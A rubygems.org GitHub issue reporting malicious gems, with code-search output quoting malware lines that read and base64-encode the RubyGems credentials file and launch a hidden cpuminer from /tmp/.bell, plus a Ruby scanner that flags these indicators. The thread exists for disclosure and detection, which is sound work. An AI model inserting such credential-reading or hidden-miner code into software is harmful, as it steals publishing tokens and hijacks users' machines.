
malware and miner in some gems #2097

Closed
znz opened this issue Aug 19, 2019 · 3 comments

Comments

@znz
Contributor

commented Aug 19, 2019

I read rest-client/rest-client#713 and searched for similar problems using gem-codesearch.
I found that some gems contain malware and mining software.

znz@aluminium:~$ csearch 'File.read.*/root/.gem/credentials'
/home/gem-codesearch/gem-codesearch/latest-gem/awesome-bot-1.18.0/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/linux.rb:          gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
znz@aluminium:~$ csearch 'cpuminer'
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike/unflaming/waffling/version3/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/linux.rb:      FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike/unflaming/waffling/test.sh:cd /tmp/.bell/ &&  nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1
@mame

Contributor

commented Aug 19, 2019

Don't miss coming-soon and cron_parser too.

znz@aluminium:~$ ls -d /home/gem-codesearch/gem-codesearch/latest-gem/*/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/awesome-bot-1.18.0/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/blockchain_wallet-0.0.7/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/capistrano-colors-0.5.5/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/coin_base-4.2.2/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/coming-soon-0.2.8/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/cron_parser-1.0.13/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/doge-coin-1.0.2/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/lita_coin-0.0.3/ext/trellislike
/home/gem-codesearch/gem-codesearch/latest-gem/omniauth_amazon-1.0.1/ext/trellislike
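For anyone who wants to check a local gem installation rather than a codesearch mirror, here is an added example (not code from this issue or from rubygems.org) that walks unpacked gem directories and flags the three indicators visible above: the read of `~/.gem/credentials` that the first `csearch` matched, the `cpuminer` / `/tmp/.bell` strings from the second search, and the `ext/trellislike` directory that every hit in the `ls` output shares. The fixture it scans is constructed in a temp directory so the script runs offline; `scan_gems_root` can be pointed at the `gems` directory under `gem env gemdir` instead.

```ruby
require "tmpdir"
require "fileutils"

# Content indicators taken from the csearch output in this issue.
INDICATORS = {
  # the matched line: the RubyGems API credentials file read and base64-encoded
  credential_read: %r{File\.read\(["'][^"']*/\.gem/credentials["']\)},
  # the miner binary and the hidden drop directory it is moved to
  miner_reference: %r{cpuminer|/tmp/\.bell},
}.freeze

# Path indicator: every affected gem carried this directory.
SUSPICIOUS_SUBDIR = "ext/trellislike".freeze

# Scan one unpacked gem directory. Returns an array of
# { file:, indicator: } hashes; an empty array means nothing matched.
def scan_gem_dir(gem_dir)
  findings = []
  if File.directory?(File.join(gem_dir, SUSPICIOUS_SUBDIR))
    findings << { file: SUSPICIOUS_SUBDIR, indicator: :suspicious_path }
  end
  Dir.glob(File.join(gem_dir, "**", "*")).sort.each do |path|
    next unless File.file?(path)
    data = File.binread(path)          # binary read: .sh and .rb are both text, but binaries must not raise
    rel = path.sub("#{gem_dir}/", "")
    INDICATORS.each do |name, re|
      findings << { file: rel, indicator: name } if data.match?(re)
    end
  end
  findings
end

# Scan every gem under a gems root (e.g. "#{`gem env gemdir`.strip}/gems").
# Returns only gems with at least one finding: { "name-version" => [findings] }.
def scan_gems_root(root)
  Dir.glob(File.join(root, "*")).sort.each_with_object({}) do |gem_dir, report|
    next unless File.directory?(gem_dir)
    hits = scan_gem_dir(gem_dir)
    report[File.basename(gem_dir)] = hits unless hits.empty?
  end
end

# Constructed fixture (not real gems): one clean gem and one that mimics the
# layout quoted in the issue, so the scanner can be exercised offline.
def build_fixture(root)
  clean = File.join(root, "tidy_gem-1.0.0", "lib")
  FileUtils.mkdir_p(clean)
  File.write(File.join(clean, "tidy_gem.rb"), "module TidyGem; VERSION = '1.0.0'; end\n")

  bad = File.join(root, "example_wallet-0.0.1", SUSPICIOUS_SUBDIR, "unflaming", "waffling")
  FileUtils.mkdir_p(bad)
  File.write(File.join(bad, "linux.rb"), <<~'RUBY')
    gem_conent = Base64.encode64(File.read("/root/.gem/credentials")).gsub("\n", "")
    FileUtils.mv("#{dir}/cpuminer", '/tmp/.bell')
  RUBY
  File.write(File.join(bad, "test.sh"),
             "cd /tmp/.bell/ && nohup ./cpuminer -c cpuminer-conf.json >/dev/null 2>&1\n")
  root
end

# Build the fixture in a temp dir, scan it, and return the report.
def demo
  Dir.mktmpdir("gemscan") do |root|
    build_fixture(root)
    return scan_gems_root(root)
  end
end

if __FILE__ == $0
  root = ARGV[0]
  report = root ? scan_gems_root(root) : demo
  report.each do |gem, hits|
    puts "#{gem}:"
    hits.each { |h| puts "  #{h[:indicator]}  #{h[:file]}" }
  end
end
```

The regexes are deliberately narrow so that a hit is worth reading by hand; the path indicator is the cheapest signal and the one that matched all nine gems in the `ls` above, so a directory check alone is a reasonable first pass across a large gem home.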
@sonalkr132

Member

commented Aug 19, 2019

Thank you for the report. We have yanked all the above-mentioned versions and locked two owners.
See https://github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019

@jjarmoc


commented Aug 29, 2019

FYI -

I just submitted a PR to the ruby-advisory-db. When this lands, bundler-audit will detect usage of the affected gems in your Gemfile.lock.

I thought this might be helpful for those working to assess the impact to their projects. As always, I highly recommend using bundler-audit as a step in your build and deploy process.
